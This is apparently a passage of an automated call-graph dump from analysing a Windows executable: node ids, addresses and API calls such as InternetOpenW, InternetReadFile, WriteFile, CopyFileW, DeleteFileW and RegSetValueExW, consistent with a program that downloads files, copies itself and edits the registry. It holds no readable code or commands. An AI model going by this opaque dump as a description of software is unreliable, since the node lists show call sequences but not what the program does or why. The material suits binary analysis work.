64524->64730 64527 8bcec 64527->64506 64528 8bde9 64528->64478 64530 8cdfa 64529->64530 64531 8ce06 CreateEventW 64529->64531 64530->64531 64532 8ce1b 64531->64532 64533 8ce34 InternetOpenW 64532->64533 64738 62170 41 API calls 64532->64738 64536 8ce6e GetLastError 64533->64536 64537 8ce77 InternetSetStatusCallbackW 64533->64537 64536->64407 64537->64407 64539 8d0e4 64538->64539 64560 8d0fd 64538->64560 64539->64451 64540 8d2a9 64783 68770 RaiseException 64540->64783 64543 8d2b5 FlushFileBuffers GetFileSize 64546 64250 56 API calls 64543->64546 64545 87a00 57 API calls 64545->64560 64547 8d32d 64546->64547 64548 8d3d4 64547->64548 64549 8d337 64547->64549 64551 623d0 RaiseException 64548->64551 64553 8d0b0 273 API calls 64549->64553 64550 8d268 64550->64451 64552 8d3de 64551->64552 64557 8d35e 64553->64557 64554 8d29f 64555 623d0 RaiseException 64554->64555 64555->64540 64556 622b0 42 API calls 64556->64560 64557->64451 64559 64250 56 API calls 64559->64560 64560->64540 64560->64545 64560->64550 64560->64554 64560->64556 64560->64559 64563 8d1b9 64560->64563 64739 8d3e0 64560->64739 64781 87580 60 API calls 64560->64781 64561 622b0 42 API calls 64561->64563 64563->64560 64563->64561 64782 87cf0 139 API calls 64563->64782 64565 8fb10 64564->64565 64566 8fbf5 64564->64566 64567 87a00 57 API calls 64565->64567 64566->64457 64568 8fb15 64567->64568 64569 8fbe3 64568->64569 64570 87a00 57 API calls 64568->64570 64569->64457 64571 8fb24 64570->64571 64571->64569 64572 87a00 57 API calls 64571->64572 64573 8fb33 64572->64573 64574 64250 56 API calls 64573->64574 64575 8fb3a 64574->64575 64576 8fb42 64575->64576 64577 8fc24 64575->64577 64581 622b0 42 API calls 64576->64581 64578 623d0 RaiseException 64577->64578 64579 8fc2e 64578->64579 64938 8fc60 145 API calls 64579->64938 64583 8fb65 64581->64583 64582 8fc51 64582->64457 64584 64250 56 API calls 64583->64584 64585 8fb6a 64584->64585 64585->64577 64586 8fb72 64585->64586 64587 622b0 42 API calls 64586->64587 64588 8fb92 64587->64588 64937 87cf0 139 API calls 64588->64937 64590 8fba3 64590->64569 64592 8c1d7 64591->64592 64593 8fae0 223 API calls 64592->64593 64594 8c1eb 64593->64594 64595 6dd30 71 API calls 64594->64595 64596 8c1ef 64594->64596 64597 8c249 64595->64597 64596->64497 64598 8c34f 64597->64598 64599 8c257 64597->64599 64601 8c415 64598->64601 64939 689f0 64598->64939 64600 87a00 57 API calls 64599->64600 64602 8c25c 64600->64602 64603 8c42f CreateFileW 64601->64603 64998 62170 41 API calls 64601->64998 64604 8c32a 64602->64604 64610 87a00 57 API calls 64602->64610 64607 8c45b 64603->64607 64608 8c46c 64603->64608 64996 8f940 139 API calls 64604->64996 64607->64608 64614 8c45f SetFilePointer 64607->64614 64973 688a0 64608->64973 64616 8c26b 64610->64616 64611 8c3f9 64617 689f0 16 API calls 64611->64617 64612 8c42c 64612->64603 64614->64608 64616->64604 64622 87a00 57 API calls 64616->64622 64620 8c40d 64617->64620 64618 8c339 64618->64497 64619 8c498 64621 87a00 57 API calls 64619->64621 64997 68f60 LocalFree LocalFree GetLastError 64620->64997 64624 8c49d 64621->64624 64625 8c27a 64622->64625 64627 8c565 64624->64627 64631 87a00 57 API calls 64624->64631 64628 64250 56 API calls 64625->64628 64630 8fae0 223 API calls 64627->64630 64643 8c281 64628->64643 64629 8c598 64992 683e0 64629->64992 64633 8c56c 64630->64633 64634 8c4ac 64631->64634 64632 8c5d0 ResetEvent InternetQueryDataAvailable 64636 8c608 GetLastError 64632->64636 64637 8c6b4 SetEvent 64632->64637 64638 8c57c GetLastError 64633->64638 64659 8c570 64633->64659 64634->64627 64642 87a00 57 API calls 64634->64642 64635 8cbab 64639 623d0 RaiseException 64635->64639 64705 8c5c8 64636->64705 64637->64705 65000 8f940 139 API calls 64638->65000 64641 8cbb5 64639->64641 64647 8c4bb 64642->64647 64643->64635 64648 622b0 42 API calls 64643->64648 64644 8cb94 64644->64497 64645 8cb86 CloseHandle 64645->64644 64646 8c625 GetLastError 64646->64705 64649 64250 56 API calls 64647->64649 64650 8c2ac 64648->64650 64652 8c4c2 64649->64652 64654 64250 56 API calls 64650->64654 64651 8c812 64651->64659 65002 8f940 139 API calls 64651->65002 64652->64635 64666 622b0 42 API calls 64652->64666 64653 8c6d2 ResetEvent InternetReadFile 64660 8c71a GetLastError 64653->64660 64661 8c82e SetEvent 64653->64661 64655 8c2b1 64654->64655 64655->64635 64662 8c2bb 64655->64662 64656 8fae0 223 API calls 64656->64705 64657 87a00 57 API calls 64657->64705 64659->64644 64659->64645 64660->64705 64661->64705 64673 622b0 42 API calls 64662->64673 64664 8c737 GetLastError 64664->64705 64665 8c67a WaitForSingleObject 64665->64646 64665->64705 64670 8c4ea 64666->64670 64667 8c845 WriteFile 64674 8c9ed GetLastError 64667->64674 64667->64705 64668 8c99d GetFileSize 64669 8cae4 64668->64669 64668->64705 64671 8cafa DeleteFileW MoveFileW 64669->64671 64672 8caeb CloseHandle 64669->64672 64675 64250 56 API calls 64670->64675 64671->64659 64676 8cb13 CopyFileW 64671->64676 64672->64671 64677 8c2d9 64673->64677 64679 87a00 57 API calls 64674->64679 64681 8c4ef 64675->64681 64682 8cb3f DeleteFileW 64676->64682 64683 8cb26 GetLastError 64676->64683 64995 87cf0 139 API calls 64677->64995 64678 8c9be 65004 8f940 139 API calls 64678->65004 64680 8c9fd 64679->64680 64687 8cb31 64680->64687 64692 87a00 57 API calls 64680->64692 64681->64635 64688 8c4f9 64681->64688 64682->64659 64683->64687 64686 8c656 Sleep 64715 8c667 64686->64715 65008 8f940 139 API calls 64687->65008 64695 622b0 42 API calls 64688->64695 64689 8c78c WaitForSingleObject 64689->64664 64689->64705 64690 8c2ea 64690->64604 64691 64250 56 API calls 64691->64705 64694 8ca0c 64692->64694 64694->64687 64696 87a00 57 API calls 64694->64696 64697 8c517 64695->64697 64699 8ca1b 64696->64699 64999 87cf0 139 API calls 64697->64999 64698 8c768 Sleep 64698->64715 64702 64250 56 API calls 64699->64702 64701 622b0 42 API calls 64701->64705 64706 8ca23 64702->64706 64703 8c528 64703->64627 64704 8c893 Sleep 64704->64715 64705->64632 64705->64635 64705->64646 64705->64651 64705->64653 64705->64656 64705->64657 64705->64659 64705->64664 64705->64665 64705->64667 64705->64668 64705->64669 64705->64678 64705->64686 64705->64689 64705->64691 64705->64698 64705->64701 64705->64704 64705->64715 65001 8d2c0 277 API calls 64705->65001 64706->64635 64707 622b0 42 API calls 64706->64707 64708 8ca4b 64707->64708 65005 87580 60 API calls 64708->65005 64709 622b0 42 API calls 64709->64715 64711 8ca54 64712 64250 56 API calls 64711->64712 64714 8ca5c 64712->64714 64714->64635 64716 8ca64 64714->64716 64715->64705 64715->64709 65003 87cf0 139 API calls 64715->65003 64724->64392 64725->64386 64726->64491 64727->64477 64728->64419 64729->64527 64730->64528 64731->64495 64732->64506 64733->64488 64734->64497 64735->64485 64736->64506 64737->64394 64738->64533 64740 64250 56 API calls 64739->64740 64741 8d410 64740->64741 64742 8d6cf 64741->64742 64745 64250 56 API calls 64741->64745 64743 623d0 RaiseException 64742->64743 64744 8d6d9 64743->64744 64746 8d431 64745->64746 64746->64742 64747 64250 56 API calls 64746->64747 64748 8d44f 64747->64748 64748->64742 64749 64250 56 API calls 64748->64749 64750 8d46d 64749->64750 64750->64742 64751 64250 56 API calls 64750->64751 64752 8d48b 64751->64752 64752->64742 64753 8d493 64752->64753 64784 7af70 64753->64784 64756 685d0 42 API calls 64757 8d4e9 64756->64757 64758 685d0 42 API calls 64757->64758 64759 8d4f5 64758->64759 64761 685d0 42 API calls 64759->64761 64760 8d540 64764 8d560 64760->64764 64856 62170 41 API calls 64760->64856 64765 8d501 64761->64765 64762 8d4ba 64762->64760 64763 8d5d6 64762->64763 64855 62170 41 API calls 64762->64855 64763->64560 64768 8d59a 64764->64768 64769 8d56a 64764->64769 64767 685d0 42 API calls 64765->64767 64772 8d50d 64767->64772 64770 8d5df 64768->64770 64775 8d5a4 64768->64775 64857 8d9a0 254 API calls 64769->64857 64803 8dde0 64770->64803 64777 685d0 42 API calls 64772->64777 64774 8d595 64774->64763 64775->64763 64778 685d0 42 API calls 64775->64778 64777->64762 64779 8d5be 64778->64779 64858 8d6e0 150 API calls 64779->64858 64781->64560 64782->64563 64783->64543 64785 624d0 41 API calls 64784->64785 64786 7afab 64785->64786 64787 64250 56 API calls 64786->64787 64788 7afc3 64787->64788 64789 7b07e 64788->64789 64792 64250 56 API calls 64788->64792 64790 623d0 RaiseException 64789->64790 64791 7b088 64790->64791 64793 7afe6 64792->64793 64793->64789 64794 64250 56 API calls 64793->64794 64795 7b009 64794->64795 64795->64789 64796 64250 56 API calls 64795->64796 64797 7b028 64796->64797 64797->64789 64798 64250 56 API calls 64797->64798 64799 7b047 64798->64799 64799->64789 64800 7b04b 64799->64800 64859 7b510 64800->64859 64910 8e9c0 ResetEvent InternetConnectW 64803->64910 64806 8e8a4 64806->64763 64807 624d0 41 API calls 64808 8de82 64807->64808 64809 8de9c HttpOpenRequestW 64808->64809 64810 622b0 42 API calls 64808->64810 64812 8df3a 64809->64812 64817 8df07 64809->64817 64810->64809 64813 8dff7 64812->64813 64818 8dfe2 InternetSetOptionW 64812->64818 64850 8df3c 64812->64850 64814 64250 56 API calls 64813->64814 64815 8fae0 223 API calls 64815->64817 64816 8e886 InternetSetStatusCallbackW 64816->64806 64817->64812 64817->64815 64817->64850 64818->64813 64850->64816 64855->64760 64856->64764 64857->64774 64858->64763 64860 64250 56 API calls 64859->64860 64861 7b59d 64860->64861 64862 67910 42 API calls 64861->64862 64863 7b5a8 InternetCrackUrlW 64862->64863 64864 7b5c7 GetLastError 64863->64864 64865 7b5d6 64863->64865 64866 7b062 64864->64866 64867 7b605 64865->64867 64869 64250 56 API calls 64865->64869 64866->64756 64866->64762 64868 7b652 64867->64868 64872 64250 56 API calls 64867->64872 64871 7b6b5 64868->64871 64875 64250 56 API calls 64868->64875 64870 7b5e8 64869->64870 64873 67910 42 API calls 64870->64873 64874 7b742 64871->64874 64878 64250 56 API calls 64871->64878 64876 7b635 64872->64876 64877 7b5f5 64873->64877 64881 64250 56 API calls 64874->64881 64899 7b7b3 64874->64899 64879 7b686 64875->64879 64880 67910 42 API calls 64876->64880 64882 685d0 42 API calls 64877->64882 64883 7b711 64878->64883 64884 67910 42 API calls 64879->64884 64885 7b642 64880->64885 64886 7b796 64881->64886 64882->64867 64887 67910 42 API calls 64883->64887 64888 7b693 64884->64888 64889 685d0 42 API calls 64885->64889 64890 67910 42 API calls 64886->64890 64891 7b71e 64887->64891 64908 7bbe0 57 API calls _wcschr 64888->64908 64889->64868 64893 7b7a3 64890->64893 64909 7bbe0 57 API calls _wcschr 64891->64909 64896 685d0 42 API calls 64893->64896 64895 7b6a2 64898 685d0 42 API calls 64895->64898 64896->64899 64897 7b72d 64900 685d0 42 API calls 64897->64900 64898->64871 64899->64866 64901 67870 57 API calls 64899->64901 64900->64874 64902 7b827 64901->64902 64903 685d0 42 API calls 64902->64903 64904 7b836 64903->64904 64904->64866 64905 69880 57 API calls 64904->64905 64906 7b882 64905->64906 64907 685d0 42 API calls 64906->64907 64907->64866 64908->64895 64909->64897 64911 8ea50 SetEvent 64910->64911 64912 8ea00 GetLastError 64910->64912 64916 8de32 64911->64916 64914 8ea0d 64912->64914 64912->64916 64913 8fae0 223 API calls 64913->64914 64914->64913 64915 8ea2c WaitForSingleObject 64914->64915 64914->64916 64915->64914 64915->64916 64916->64806 64916->64807 64937->64590 64938->64582 64940 68a7c LoadLibraryW 64939->64940 64941 68c7a 64939->64941 64942 68aa1 GetLastError 64940->64942 64943 68abf GetProcAddress 64940->64943 64946 68680 3 API calls 64941->64946 64960 68b31 64942->64960 64944 68acf FreeLibrary GetLastError 64943->64944 64945 68afb FreeLibrary 64943->64945 64944->64960 64949 68b38 64945->64949 64950 68b28 GetLastError 64945->64950 64948 68cb3 64946->64948 64952 68cd9 GetLastError 64948->64952 64964 68c48 64948->64964 65009 68680 64949->65009 64950->64960 64958 68ce8 64952->64958 64952->64964 64954 68680 3 API calls 64955 68b78 LookupAccountSidW 64954->64955 64956 68ba6 GetLastError 64955->64956 64955->64964 64957 68bb1 64956->64957 64956->64960 64959 68680 3 API calls 64957->64959 64961 68680 3 API calls 64958->64961 64962 68bcc 64959->64962 64960->64611 64963 68d1c 64961->64963 64965 68680 3 API calls 64962->64965 64963->64964 64967 68d3e GetLastError 64963->64967 64964->64960 64966 623d0 RaiseException 64964->64966 64969 68e2a 64964->64969 64968 68be7 LookupAccountSidW 64965->64968 64966->64969 64967->64964 64968->64964 64970 68c0a GetLastError 64968->64970 64969->64960 64971 623d0 RaiseException 64969->64971 64970->64960 64972 68f3a 64971->64972 64974 68918 64973->64974 64988 688db 64973->64988 64975 68924 64974->64975 64978 e1a14 ___std_exception_copy 14 API calls 64974->64978 64976 68948 64975->64976 64979 e1a14 ___std_exception_copy 14 API calls 64975->64979 64981 68970 64976->64981 64982 6896d LocalFree 64976->64982 64977 689df 65016 68770 RaiseException 64977->65016 64978->64975 64979->64976 64984 68977 LocalFree 64981->64984 64985 6897a 64981->64985 64982->64981 64983 689eb 64984->64985 64987 6898b 64985->64987 64989 e1a14 ___std_exception_copy 14 API calls 64985->64989 64986 68903 LocalFree 64986->64988 64990 689b6 64987->64990 64991 e1a14 ___std_exception_copy 14 API calls 64987->64991 64988->64974 64988->64977 64988->64986 64989->64987 64990->64619 64990->64629 64991->64990 64993 d836b 3 API calls 64992->64993 64994 68424 64993->64994 64994->64705 64995->64690 64996->64618 64997->64601 64998->64612 64999->64703 65000->64659 65001->64705 65002->64659 65003->64715 65004->64659 65005->64711 65008->64659 65012 d836b 65009->65012 65013 d8c22 65012->65013 65014 d8130 std::_Facet_Register 3 API calls 65013->65014 65015 686d5 65014->65015 65015->64954 65016->64983 65017 98770 65018 64250 56 API calls 65017->65018 65019 987aa 65018->65019 65020 987eb 65019->65020 65021 987b0 65019->65021 65022 623d0 RaiseException 65020->65022 65024 9a050 60 API calls 65021->65024 65023 987f5 65022->65023 65025 64250 56 API calls 65023->65025 65026 987d6 65024->65026 65027 9882f 65025->65027 65028 98990 65027->65028 65032 9a050 60 API calls 65027->65032 65029 623d0 RaiseException 65028->65029 65030 9899a 65029->65030 65031 64250 56 API calls 65030->65031 65033 989ce 65031->65033 65034 98859 65032->65034 65035 98af2 65033->65035 65043 9a050 60 API calls 65033->65043 65036 98860 65034->65036 65037 64250 56 API calls 65034->65037 65038 623d0 RaiseException 65035->65038 65039 98883 65037->65039 65040 98afc 65038->65040 65039->65028 65041 9888b 65039->65041 65042 64250 56 API calls 65040->65042 65050 685d0 42 API calls 65041->65050 65044 98b2f 65042->65044 65045 989f8 65043->65045 65047 98c7a 65044->65047 65057 9a050 60 API calls 65044->65057 65046 98a98 65045->65046 65048 64250 56 API calls 65045->65048 65049 623d0 RaiseException 65047->65049 65051 98a1f 65048->65051 65052 98c84 65049->65052 65053 988ab RegCreateKeyExW 65050->65053 65051->65035 65054 98a27 65051->65054 65055 64250 56 API calls 65052->65055 65124 67b90 RegQueryValueExW RegQueryValueExW 65053->65124 65062 685d0 42 API calls 65054->65062 65058 98cbe 65055->65058 65059 98b59 65057->65059 65060 98dea 65058->65060 65073 9a050 60 API calls 65058->65073 65061 98b60 65059->65061 65064 64250 56 API calls 65059->65064 65063 623d0 RaiseException 65060->65063 65065 98a47 RegCreateKeyExW 65062->65065 65067 98df4 65063->65067 65068 98b83 65064->65068 65071 98a71 RegSetValueExW 65065->65071 65072 98a86 65065->65072 65066 988f3 65066->65036 65077 9892c RegCloseKey 65066->65077 65069 64250 56 API calls 65067->65069 65068->65047 65070 98b8b 65068->65070 65074 98e2f 65069->65074 65081 685d0 42 API calls 65070->65081 65071->65072 65072->65046 65075 98a91 RegCloseKey 65072->65075 65076 98ce8 65073->65076 65078 98f89 65074->65078 65087 9a050 60 API calls 65074->65087 65075->65046 65079 98d90 65076->65079 65082 64250 56 API calls 65076->65082 65077->65036 65080 623d0 RaiseException 65078->65080 65083 98f93 FileTimeToSystemTime 65080->65083 65084 98bab RegCreateKeyExW 65081->65084 65085 98d0f 65082->65085 65086 64250 56 API calls 65083->65086 65088 98bfa 65084->65088 65089 98bd5 RegQueryValueExW 65084->65089 65085->65060 65090 98d17 65085->65090 65091 98ffd 65086->65091 65092 98e59 65087->65092 65088->65061 65095 98c16 RegCloseKey 65088->65095 65089->65088 65096 685d0 42 API calls 65090->65096 65093 99136 65091->65093 65104 9a050 60 API calls 65091->65104 65094 98e60 65092->65094 65097 64250 56 API calls 65092->65097 65098 623d0 RaiseException 65093->65098 65095->65061 65099 98d37 RegCreateKeyExW 65096->65099 65100 98e83 65097->65100 65101 99140 65098->65101 65102 98d68 RegSetValueExW 65099->65102 65103 98d7e 65099->65103 65100->65078 65105 98e8b 65100->65105 65102->65103 65103->65079 65106 98d89 RegCloseKey 65103->65106 65107 99029 65104->65107 65110 685d0 42 API calls 65105->65110 65106->65079 65108 990d2 65107->65108 65109 64250 56 API calls 65107->65109 65111 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65108->65111 65112 99056 65109->65112 65113 98eab RegCreateKeyExW 65110->65113 65115 99130 65111->65115 65112->65093 65116 99060 65112->65116 65125 67b90 RegQueryValueExW RegQueryValueExW 65113->65125 65117 685d0 42 API calls 65116->65117 65118 99083 RegCreateKeyExW 65117->65118 65120 990ad RegSetValueExW 65118->65120 65121 990c0 65118->65121 65119 98eec 65119->65094 65123 98f25 RegCloseKey 65119->65123 65120->65121 65121->65108 65122 990cb RegCloseKey 65121->65122 65122->65108 65123->65094 65124->65066 65125->65119 65126 9e3d0 65127 9e400 65126->65127 65132 9e43c 65126->65132 65128 afa40 54 API calls 65127->65128 65130 9e408 65128->65130 65129 9e426 65131 9e40c ShowWindow ShowWindow 65130->65131 65130->65132 65131->65129 65132->65129 65133 9e624 65132->65133 65135 9e479 65132->65135 65224 68770 RaiseException 65133->65224 65137 b64c0 57 API calls 65135->65137 65136 9e630 65138 623d0 RaiseException 65136->65138 65140 9e481 65137->65140 65139 9e63a 65138->65139 65168 b6950 GetModuleFileNameW 65140->65168 65143 9e5c3 65145 9e640 14 API calls 65143->65145 65147 9e60e 65145->65147 65169 b69a6 65168->65169 65169->65169 65170 622b0 42 API calls 65169->65170 65171 b69c2 65170->65171 65172 b69cf 65171->65172 65173 b6c17 65171->65173 65264 65d30 62 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65172->65264 65238 ce730 65173->65238 65177 b6c29 GetLastError 65218 b6cc9 65177->65218 65178 b69dd 65182 63430 RaiseException 65178->65182 65179 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65181 9e492 65179->65181 65180 b6a27 _wcsrchr 65184 67870 57 API calls 65180->65184 65188 b6a69 _wcsrchr 65180->65188 65181->65143 65219 9dd30 65181->65219 65183 b6a18 65182->65183 65265 63c90 65183->65265 65186 b6a59 65184->65186 65189 685d0 42 API calls 65186->65189 65187 b6abb 65225 b65f0 65187->65225 65188->65187 65192 69880 57 API calls 65188->65192 65189->65188 65194 b6aab 65192->65194 65193 685d0 42 API calls 65196 b6afc CopyFileW SetFileAttributesW 65193->65196 65195 685d0 42 API calls 65194->65195 65195->65187 65198 b65f0 42 API calls 65196->65198 65199 b6b4a 65198->65199 65200 685d0 42 API calls 65199->65200 65201 b6b5a CreateFileW WriteFile 65200->65201 65203 b6bea 65201->65203 65204 b6bcc 65201->65204 65207 64250 56 API calls 65203->65207 65205 b6bdc DeleteFileW 65204->65205 65206 b6bd0 65204->65206 65205->65203 65206->65205 65208 b6c0b 65207->65208 65209 b6cf0 65208->65209 65212 b6c15 65208->65212 65210 623d0 RaiseException 65209->65210 65211 b6cfa 65210->65211 65212->65212 65213 b6c7c 65212->65213 65214 63430 RaiseException 65212->65214 65269 b6d00 42 API calls 65213->65269 65214->65213 65216 b6cbd 65270 68280 43 API calls __Getctype 65216->65270 65218->65179 65220 9dd75 65219->65220 65221 b65f0 42 API calls 65220->65221 65222 9dd85 DeleteFileW 65221->65222 65324 d4d90 65222->65324 65224->65136 65226 624d0 41 API calls 65225->65226 65229 b6636 65226->65229 65227 b66ff 65228 623d0 RaiseException 65227->65228 65230 b6709 65228->65230 65229->65227 65231 b6678 65229->65231 65234 b668a 65229->65234 65271 62240 41 API calls 65229->65271 65231->65227 65231->65234 65232 622b0 42 API calls 65235 b66a6 65232->65235 65234->65232 65236 622b0 42 API calls 65235->65236 65237 b66ce 65236->65237 65237->65193 65272 6d310 GetTempPathW 65238->65272 65241 685d0 42 API calls 65242 ce782 65241->65242 65243 64250 56 API calls 65242->65243 65263 ce7ae 65242->65263 65245 ce7ba 65243->65245 65244 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65246 b6c21 65244->65246 65247 ce7c4 65245->65247 65248 ce8b3 65245->65248 65246->65177 65246->65180 65251 6c4a0 44 API calls 65247->65251 65249 623d0 RaiseException 65248->65249 65250 ce8bd 65249->65250 65252 ce7e2 65251->65252 65253 ce7f9 65252->65253 65318 64890 41 API calls 65252->65318 65290 6e620 65253->65290 65259 6e6f0 5 API calls 65260 ce851 65259->65260 65304 6bf00 65260->65304 65262 ce868 CreateDirectoryW 65262->65263 65263->65244 65264->65178 65266 63cbd 65265->65266 65267 63cde std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65265->65267 65266->65265 65266->65267 65323 dcfaf 41 API calls 2 library calls 65266->65323 65267->65180 65269->65216 65270->65218 65271->65231 65273 6d3b3 65272->65273 65274 6d369 65272->65274 65276 6d427 65273->65276 65277 6d3cf 65273->65277 65275 64250 56 API calls 65274->65275 65278 6d36e 65275->65278 65319 d8290 5 API calls std::_Locinfo::_Locinfo_dtor 65276->65319 65280 64250 56 API calls 65277->65280 65281 6d42c 65278->65281 65289 6d376 65278->65289 65283 6d3db 65280->65283 65282 623d0 RaiseException 65281->65282 65284 6d436 65282->65284 65283->65281 65287 6d3e1 65283->65287 65285 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65286 6d3ab 65285->65286 65286->65241 65288 63430 RaiseException 65287->65288 65287->65289 65288->65289 65289->65285 65291 6e6b8 65290->65291 65292 6e62d 65290->65292 65296 6e6f0 65291->65296 65292->65291 65320 6e820 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65292->65320 65295 6e68e 65295->65291 65321 6e820 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65295->65321 65297 6e774 65296->65297 65298 6e70b 65296->65298 65299 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65297->65299 65298->65298 65301 6e620 5 API calls 65298->65301 65300 6e7bc 65299->65300 65300->65259 65302 6e766 65301->65302 65303 6e620 5 API calls 65302->65303 65303->65297 65305 6bf30 65304->65305 65306 64250 56 API calls 65305->65306 65310 6bf4d 65305->65310 65307 6bf40 65306->65307 65308 6bfc1 65307->65308 65307->65310 65309 623d0 RaiseException 65308->65309 65311 6bfcb 65309->65311 65312 6bf78 65310->65312 65322 6c040 44 API calls 65310->65322 65313 6c002 RegCloseKey 65311->65313 65314 6c010 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65311->65314 65316 622b0 42 API calls 65312->65316 65313->65314 65314->65262 65317 6bf8d 65316->65317 65317->65262 65318->65253 65319->65281 65320->65295 65321->65295 65322->65312 65325 624d0 41 API calls 65324->65325 65326 d4dd3 65325->65326 65327 d4df8 CreateFileW 65326->65327 65343 d4eae 65326->65343 65329 d4e2f GetLastError 65327->65329 65330 d4e45 WriteFile 65327->65330 65328 d4f1f 65554 9adf0 65328->65554 65332 d4e7b CloseHandle 65329->65332 65333 d4e91 65330->65333 65334 d4e63 GetLastError 65330->65334 65335 d4e88 65332->65335 65336 d4ea0 CloseHandle 65333->65336 65333->65343 65334->65335 65339 d4e7a 65334->65339 65340 d4e8c 65335->65340 65335->65343 65336->65343 65337 d4f31 65338 d4f78 65608 68770 RaiseException 65338->65608 65339->65332 65340->65337 65342 d4f84 65343->65328 65343->65338 65344 d4f0f 65343->65344 65347 b95e0 65343->65347 65344->65328 65607 a1d50 57 API calls 65344->65607 65348 64250 56 API calls 65347->65348 65352 b9617 65348->65352 65349 ba7c4 65350 623d0 RaiseException 65349->65350 65351 ba7ce 65350->65351 65353 623d0 RaiseException 65351->65353 65352->65349 65355 b9653 65352->65355 65357 63430 RaiseException 65352->65357 65354 ba7d8 65353->65354 65356 623d0 RaiseException 65354->65356 65362 64250 56 API calls 65355->65362 65358 ba7e2 65356->65358 65357->65355 65359 623d0 RaiseException 65358->65359 65360 ba7ec 65359->65360 65615 68770 RaiseException 65360->65615 65368 b969b 65362->65368 65363 ba7f8 65364 623d0 RaiseException 65363->65364 65365 ba802 65364->65365 65366 623d0 RaiseException 65365->65366 65367 ba80c 65366->65367 65369 623d0 RaiseException 65367->65369 65368->65351 65371 b96d7 65368->65371 65373 63430 RaiseException 65368->65373 65370 ba816 65369->65370 65372 623d0 RaiseException 65370->65372 65376 64250 56 API calls 65371->65376 65374 ba820 65372->65374 65373->65371 65375 623d0 RaiseException 65374->65375 65377 ba82a 65375->65377 65378 b9715 65376->65378 65379 623d0 RaiseException 65377->65379 65378->65349 65384 67990 60 API calls 65378->65384 65380 ba834 65379->65380 65381 623d0 RaiseException 65380->65381 65382 ba83e 65381->65382 65383 623d0 RaiseException 65382->65383 65385 ba848 65383->65385 65386 b9745 65384->65386 65387 623d0 RaiseException 65385->65387 65388 64250 56 API calls 65386->65388 65389 ba852 65387->65389 65394 b9755 65388->65394 65390 623d0 RaiseException 65389->65390 65391 ba85c 65390->65391 65392 623d0 RaiseException 65391->65392 65393 ba866 65392->65393 65395 623d0 RaiseException 65393->65395 65394->65354 65397 63430 RaiseException 65394->65397 65417 b978e 65394->65417 65396 ba870 65395->65396 65398 623d0 RaiseException 65396->65398 65397->65417 65411 b98fa 65551 a0490 63 API calls 65411->65551 65414 b9913 65416 681e0 std::generic_category 14 API calls 65414->65416 65419 b991f 65416->65419 65417->65360 65417->65411 65609 68280 43 API calls __Getctype 65417->65609 65421 64250 56 API calls 65419->65421 65422 b9924 65421->65422 65422->65349 65424 67990 60 API calls 65422->65424 65425 b9951 65424->65425 65426 64250 56 API calls 65425->65426 65427 b9961 65426->65427 65427->65358 65428 63430 RaiseException 65427->65428 65429 b999a 65427->65429 65428->65429 65430 b9a1f 65429->65430 65432 64250 56 API calls 65429->65432 65431 64250 56 API calls 65430->65431 65433 b9a62 65431->65433 65434 b99e6 65432->65434 65433->65365 65435 b9a9b 65433->65435 65436 63430 RaiseException 65433->65436 65434->65363 65434->65430 65437 63430 RaiseException 65434->65437 65552 a0490 63 API calls 65435->65552 65436->65435 65437->65430 65438 b9aea 65439 b9b3c 65438->65439 65441 64250 56 API calls 65438->65441 65440 b9bc4 65439->65440 65442 64250 56 API calls 65439->65442 65553 a0490 63 API calls 65440->65553 65448 b9b03 65441->65448 65449 b9b8b 65442->65449 65443 b9c18 65444 b9c67 65443->65444 65445 64250 56 API calls 65443->65445 65446 64250 56 API calls 65444->65446 65452 b9c2e 65445->65452 65447 b9c9f 65446->65447 65447->65349 65448->65367 65448->65439 65450 63430 RaiseException 65448->65450 65449->65370 65449->65440 65453 63430 RaiseException 65449->65453 65450->65439 65452->65374 65452->65444 65456 63430 RaiseException 65452->65456 65453->65440 65456->65444 65551->65414 65552->65438 65553->65443 65555 64250 56 API calls 65554->65555 65559 9ae2a 65555->65559 65556 9b398 65557 623d0 RaiseException 65556->65557 65558 9b3a2 65557->65558 65559->65556 65560 9ae66 65559->65560 65561 63430 RaiseException 65559->65561 65562 64250 56 API calls 65560->65562 65561->65560 65563 9ae72 65562->65563 65563->65556 65564 63430 RaiseException 65563->65564 65565 9aeab 65563->65565 65564->65565 65566 64250 56 API calls 65565->65566 65567 9af0b 65566->65567 65567->65556 65568 9af47 65567->65568 65569 63430 RaiseException 65567->65569 65570 64250 56 API calls 65568->65570 65569->65568 65571 9af53 65570->65571 65571->65556 65572 63430 RaiseException 65571->65572 65573 9af8c 65571->65573 65572->65573 65574 64250 56 API calls 65573->65574 65575 9afec 65574->65575 65575->65556 65576 9b028 65575->65576 65577 63430 RaiseException 65575->65577 65578 64250 56 API calls 65576->65578 65577->65576 65579 9b034 65578->65579 65579->65556 65580 63430 RaiseException 65579->65580 65581 9b06d 65579->65581 65580->65581 65582 64250 56 API calls 65581->65582 65596 9b163 65581->65596 65584 9b0e2 65582->65584 65583 64250 56 API calls 65585 9b1d3 65583->65585 65584->65556 65586 9b11e 65584->65586 65588 63430 RaiseException 65584->65588 65585->65556 65587 9b20f 65585->65587 65590 63430 RaiseException 65585->65590 65589 64250 56 API calls 65586->65589 65591 64250 56 API calls 65587->65591 65588->65586 65592 9b12a 65589->65592 65590->65587 65593 9b21b 65591->65593 65592->65556 65594 63430 RaiseException 65592->65594 65592->65596 65593->65556 65595 63430 RaiseException 65593->65595 65597 9b254 65593->65597 65594->65596 65595->65597 65596->65583 65606 9b330 65596->65606 65598 64250 56 API calls 65597->65598 65599 9b2af 65598->65599 65599->65556 65600 9b2eb 65599->65600 65602 63430 RaiseException 65599->65602 65601 64250 56 API calls 65600->65601 65603 9b2f7 65601->65603 65602->65600 65603->65556 65604 9b2ff 65603->65604 65605 63430 RaiseException 65604->65605 65604->65606 65605->65606 65606->65337 65607->65328 65608->65342 65609->65417 65615->65363 65616 bcd10 65617 64250 56 API calls 65616->65617 65618 bcd41 65617->65618 